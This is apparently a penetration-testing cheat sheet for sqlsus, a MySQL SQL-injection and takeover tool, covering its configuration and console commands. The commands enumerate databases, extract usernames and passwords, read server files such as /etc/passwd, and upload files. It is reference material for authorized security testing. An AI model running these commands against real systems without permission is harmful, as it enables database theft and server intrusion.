SQLSUS
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
sqlsus is a MySQL injection and takeover tool written in Perl. It uses a command-line interface similar to a MySQL console to interact with a database through SQL injection vulnerabilities.
BASIC USAGE#
sqlsus <config_file> # Start with config file sqlsus -g <config_file> # Generate config template
SETUP#
# 1. Generate config template: sqlsus -g target.conf # 2. Edit config file with injection details: # - Target URL # - Injectable parameter # - Injection type # 3. Launch sqlsus: sqlsus target.conf
CONFIGURATION FILE#
# Key settings in config file: # Target URL with injection point our $url = "http://target.com/page.php?id=1"; # Injection parameter our $param = "id"; # Request method our $method = "GET"; # Injection type our $injection_type = "intband"; # UNION-based # or our $injection_type = "blind"; # Blind injection # Authentication our $cookie = "session=abc123";
INTERACTIVE COMMANDS#
# Database enumeration:
get databases # List all databases
get tables # List tables in current DB
get tables from <database> # List tables in specific DB
get columns from <table> # List columns in table
# Data extraction:
select <col1>,<col2> from <table>
# Extract data
select * from <table> limit 10 # First 10 rows
count <table> # Count rows in table
# Database info:
get info # Database version, user, etc.
get users # List database users
get privileges # Show user privileges
# File operations:
get file "/etc/passwd" # Read file from server
upload "local.txt" "/tmp/remote.txt"
# Upload file to server
# System:
get uptime # Database uptime
get datadir # Data directory path
INJECTION TYPES#
# intband (UNION/in-band): # - Fastest extraction method # - Data returned directly in response # blind (Boolean-based): # - Slower, character-by-character # - Works when no output visible # timebased: # - Uses time delays # - Slowest but most reliable
EXAMPLES#
# Generate and edit config sqlsus -g myattack.conf # Edit myattack.conf with target details # Start session sqlsus myattack.conf # Inside sqlsus console: get databases get tables from users_db get columns from users select username,password from users get file "/etc/passwd"
AUTOCOMPLETION#
# sqlsus supports tab completion for: # - Commands # - Database names # - Table names # - Column names
CLONE FEATURE#
# Clone database to local SQLite: clone <database> # Clone entire database locally # Then query locally without sending requests
NOTES#
- Perl-based tool, MySQL-specific - MySQL console-like interface - Supports UNION and blind injection - Clone feature for offline analysis - Tab completion for convenience - Config file must be customized per target - Use for MySQL targets only (not MSSQL, Oracle, etc.) - Pair with sqlmap for other DBMS types - Only for authorized penetration testing